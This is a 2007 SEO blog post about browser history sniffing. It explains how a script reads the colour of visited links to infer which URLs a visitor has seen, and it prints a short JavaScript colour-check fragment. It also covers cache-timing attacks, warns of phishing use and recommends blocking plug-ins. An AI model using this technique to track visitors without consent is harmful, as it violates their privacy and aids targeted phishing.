Competitive research or privacy attack?

by Hamlet Batista | June 02, 2007 | 1 Comments

I found an interesting tool via Seobook.com. It exploits a “feature” of current browsers that do not properly partition persistent client-side state information (visited links and caching information) on a per site basis.

The tool can identify URLs in your visitor’s browsing history. Aaron suggests this be used to check if your visitors come from competing sites and adjust your marketing strategy accordingly.

This might not work as Aaron might expect. You can only tell that the visitor visited those URLs in the last n days (n the number of days the user keeps in his or her browsing history). You won’t be able to tell when, how often or how recently those URLs where visited.

While this is very useful for marketing purposes, the window for taking advantage of this for other purposes is huge. Collecting information on users without their consent doesn’t sound very good either.

Reader Dave comments:

I’ve always been conscious of the technical possibility of this and taken some safeguards against it. Still, as a user, I’d be furious if I knew this technique were being used on me, and I will be keeping my eye out for any precedent-setting legal challenges to this.

As a publisher/affiliate, I refuse to stoop this low. It’s disappointing but not unexpected that a great deal of readers here would be so sanguine about something so blatantly unethical.

Your user’s history object is none of your [edited] business.

Imagine a phisher that uses this to identify the on-line bank you use. With this information, his scam will be far more effective. Most people ignore emails from institutions they are not affiliated with.

Another reader pointed to a Firefox plug-in that solves the visited-link based attack problem. Here is another plug-in that prevents cache-based attacks. I installed both of them immediately.

The tool Aaron mentions exploits the visited-link vulnerability. Here is how it works:

Your browser, by default, colors visited links in a different color than normal ones. That information is available via CSS and client-side Javascript. The script works by pulling a list of target URLs, using Ajax (this happens with no user action), inspecting their color and flagging the ones that have the visited-link color — these are the ones the visitor has previously visited.

     if (link.currentStyle) {      		var color = link.currentStyle.color;      		if (color == ‘#ff0000′) /* Here is the color inspection */      			return true;      		return false;      }

This is possible because our browsers don’t make sure the links flagged as visited are not in a page in the same domain of the link. It is very likely this will be fixed in future browser releases.

It might seem that disabling Javascript solves the problem, but this trick can be done as well with CSS only. Check https://www.indiana.edu/~phishing/browser-recon

Another form of attack, not used by the tool, is measuring the time the browser takes to open target URLs. URLs that have been visited are generally cached and load faster. Comparing timing information one can tell if a page was visited or not.

The plug-ins mentioned above protect from both types of attacks.

For more information visit: http://crypto.stanford.edu/sameorigin/

See also this papers for more background information:

Protecting browser state from web privacy attacks
Invasive browser sniffing and counter measures
Timing attacks on web privacy

Hamlet Batista

Chief Executive Officer

Hamlet Batista is CEO and founder of RankSense, an agile SEO platform for online retailers and manufacturers. He holds US patents on innovative SEO technologies, started doing SEO as a successful affiliate marketer back in 2002, and believes great SEO results should not take 6 months

1

REPLIES

Try our SEO automation tool for free!

RankSense automatically creates search snippets using advanced natural language generation. Get your free trial today.

OUR BLOG

Latest news and tactics

What do you do when you’re losing organic traffic and you don’t know why?

Getting Started with NLP and Python for SEO [Webinar]

Custom Python scripts are much more customizable than Excel spreadsheets.  This is good news for SEOs — this can lead to optimization opportunities and low-hanging fruit.  One way you can use Python to uncover these opportunities is by pairing it with natural language processing. This way, you can match how your audience searches with your...

READ POST
Making it easier to implement SEO changes on your website

Changes to the RankSense SEO rules interface

As we continue to improve the RankSense app for Cloudflare, we are always working to make the app more intuitive and easy to use. I'm pleased to share that we have made significant changes to our SEO rules interface in the settings tab of our app. It is now easier to publish multiple rules sheets and to see which changes have not yet been published to production.

READ POST

How to Find Content Gaps at Scale: Atrapalo vs Skyscanner

For the following Ranksense Webinar, we were joined by Antoine Eripret, who works at Liligo as an SEO lead. Liligo.com is a travel search engine which instantly searches all available flight, bus and train prices on an exhaustive number of travel sites such as online travel agencies, major and low-cost airlines and tour-operators. In this...

READ POST

Exciting News!
seoClarity acquires RankSense

X